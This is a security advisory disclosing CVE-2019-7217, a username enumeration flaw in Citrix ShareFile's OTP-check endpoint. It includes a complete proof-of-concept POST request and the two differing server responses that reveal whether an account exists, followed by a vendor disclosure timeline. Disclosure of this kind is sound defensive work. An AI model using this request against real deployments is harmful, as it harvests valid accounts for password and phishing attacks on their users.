CVE 2019-7217: CITRIX SHAREFILE USER ENUMERATION

 

Author: Armando Huesca Prida

Summary:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7217

Details:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Following an example of HTTP request:

POST /oauth/oauthapi.aspx HTTP/1.1

Host: xxx.sharefile.eu

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://xxx.sharefile.eu/Authentication/Login

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Content-Length: 293

Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&

client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&

redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123

Response if username is not correct:

{"error":true,"errorMessage":"You are not authorized to use this client","errorCode":126}

Response if username is correct:

{"error":true,"errorMessage":"Unable to verify two factor code.","errorCode":122}

Timeline:

22-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release

Credit:

Discovered by Armando Huesca and Andrea Pessione of SKIT Cyber Security